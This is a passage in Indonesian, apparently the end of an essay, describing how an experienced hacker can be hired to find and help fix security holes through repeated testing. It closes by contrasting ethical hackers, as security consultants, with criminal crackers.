Seorang hacker bisa dipekerjakan untuk mencari celah-celah (hole) dalam sebuah sistem keamanan. Hacker akan menggunakan berbagai teknik yang diketahuinya termasuk teknik-teknik di atas untuk melakukan penetrasi ke dalam sistem. Hacker juga akan mengkombinasikan berbagai cara di atas dan menggunakan berbagai teknik terbaru yang lebih canggih. Dengan demikian diharapkan titik rawan dalam sebuah sistem dapat diketahui untuk kemudian dilakukan perbaikan. Setelah perbaikan dilakukan (dengan melibatkan sang hacker), sistem akan kembali diuji. Demikianlah proses ini dilakukan berulang-ulang sehingga semua celah yang ada dalam sistem kemanan bisa ditutup.

Untuk melakukan proses ini, tentunya dibutuhkan seorang hacker yang benar-benar berpengalaman dan memiliki tingkat pengetahuan yang tinggi. Tidak semua hacker bisa melakukan hal ini dengan baik, apalagi jika kita memakai seorang cracker.

PENUTUP

Seorang hacker kini bisa memainkan peran sebagai konsultan keamanan bagi para vendor ataupun developer software maupun bagi perusahan-perusahaan yang menggunakan sistem komputer sebagai tulang punggung berjalannya kegiatan perusahaan. Dengan perannya ini, hacker diharapakan bisa membuat sebuah sistem ataupun sebuah software tetap survive dan tidak mengalami kehancuran akibat tindak kejahatan komputer yang dilakukan oleh para cracker.

Menjadi hacker adalah sebuah kebaikan tetapi menjadi seorang cracker adalah sebuah kejahatan.